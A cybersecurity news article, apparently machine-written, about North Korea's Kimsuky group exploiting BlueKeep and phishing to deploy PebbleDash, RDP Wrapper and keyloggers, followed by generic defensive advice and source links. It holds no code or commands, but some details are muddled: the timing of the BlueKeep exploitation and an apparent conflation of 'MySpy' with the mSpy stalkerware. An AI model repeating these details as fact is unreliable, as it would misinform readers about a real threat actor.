Ethical Hacking News
A North Korea-linked group known as Kimsuky has been linked to a sophisticated attack campaign that exploited a patched Microsoft Remote Desktop Services flaw to gain unauthorized access to compromised systems. The group's use of multiple vectors in their attack campaign highlights their sophistication and persistence as a threat actor, and underscores the need for organizations to prioritize cybersecurity measures to mitigate these threats.
Kimsuky, a North Korea-linked group, has been linked to the Reconnaissance General Bureau (RGB) foreign intelligence service since 2013.The group exploited a patched Microsoft Remote Desktop Services flaw (BlueKeep) to gain initial access to target systems in 2023.Kimsuky used spear-phishing messages, PowerShell scripts, and malware such as PebbleDash and RDP Wrapper to maintain remote access to infected systems.The group used multiple vectors, including exploiting a Microsoft Office Equation Editor vulnerability, to distribute malware.Kimsuky targeted organizations in several countries, including South Korea, the U.S., China, Japan, and others, since September 2023.The group's primary target appears to be organizations involved in think tanks and government institutions.The discovery highlights the ongoing threat posed by state-sponsored hackers and the importance of prioritizing cybersecurity measures.
Cybersecurity experts have been left reeling from a recent discovery of a highly sophisticated attack campaign carried out by a North Korea-linked group known as Kimsuky. The group, also referred to as ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, has been linked to the Reconnaissance General Bureau (RGB) foreign intelligence service since its inception in 2013.
According to researchers at AhnLab SEcurity intelligence Center (ASEC), Kimsuky exploited a patched Microsoft Remote Desktop Services flaw, known as BlueKeep (CVE-2019-0708), to gain initial access to target systems. This vulnerability was first identified in 2019 and subsequently patched by Microsoft; however, the ASEC researchers discovered that the group had already begun exploiting this vulnerability to gain unauthorized access to compromised systems.
The attack campaign, tracked as Larva-24005, involved a range of tactics, including the use of spear-phishing messages to distribute malicious files. These files were designed to execute PowerShell or Mshta scripts, which would then download malware such as PebbleDash and RDP Wrapper, allowing the attackers to maintain remote access to infected systems.
In addition to exploiting the BlueKeep vulnerability, Kimsuky also utilized other methods to distribute malware, including attaching the same file to emails and exploiting a Microsoft Office Equation Editor vulnerability (CVE-2017-11882). The group's use of multiple vectors in their attack campaign highlights their sophistication and persistence as a threat actor.
Once they gained access to the systems, the attackers modified the configuration by installing MySpy malware and RDPWrap to maintain remote access. In the final stage of the attack, Kimsuky deployed keyloggers, such as KimaLogger or RandomQuery, to record keystrokes.
The ASEC researchers noted that Kimsuky had previously targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries since September 2023. Their activity has included phishing campaigns against South Korea and Japan and attacks on South Korea's software, energy, and financial sectors starting in October 2023.
The Kimsuky group is believed to work under the control of the Reconnaissance General Bureau (RGB) foreign intelligence service, which is responsible for collecting and analyzing information related to national security. The group's primary target appears to be organizations involved in think tanks and government institutions, although they have also targeted other sectors such as finance and technology.
The discovery of Kimsuky's attack campaign highlights the ongoing threat posed by state-sponsored hackers and their sophisticated methods for exploiting vulnerabilities in software and networks. As cybersecurity experts continue to monitor the group's activities, it is essential that organizations take steps to protect themselves from similar attacks.
In light of this development, it is crucial that organizations prioritize cybersecurity measures, including regular vulnerability assessments, penetration testing, and employee training on phishing and malware awareness. By taking proactive steps to mitigate these threats, organizations can significantly reduce their risk of being targeted by sophisticated attackers like Kimsuky.
Related Information:
https://www.ethicalhackingnews.com/articles/Kimsuky-APT-Exploits-BlueKeep-RDP-Flaw-in-Sophisticated-Attack-Campaign-ehn.shtml
https://securityaffairs.com/176756/apt/kimsuky-apt-exploited-bluekeep-rdp-flaw-in-attacks-against-south-korea-and-japan.html
https://nvd.nist.gov/vuln/detail/CVE-2019-0708
https://www.cvedetails.com/cve/CVE-2019-0708/
https://nvd.nist.gov/vuln/detail/CVE-2017-11882
https://www.cvedetails.com/cve/CVE-2017-11882/
https://www.malwarebytes.com/blog/news/2024/07/dangerous-monitoring-tool-mspy-suffers-data-breach-exposes-customer-details
https://techcrunch.com/2024/07/11/mspy-spyware-millions-customers-data-breach/
https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a
https://thesecmaster.com/blog/kimsuky-apt-group
https://en.wikipedia.org/wiki/Kimsuky
https://social.cyware.com/news/thallium-hacking-groups-malicious-websites-tracked-and-taken-down-by-microsoft-d7b37006
https://attack.mitre.org/groups/G0094/
https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://thehackernews.com/2023/04/google-tag-warns-of-north-korean-linked.html
Published: Mon Apr 21 14:53:17 2025 by llama3.2 3B Q4_K_M
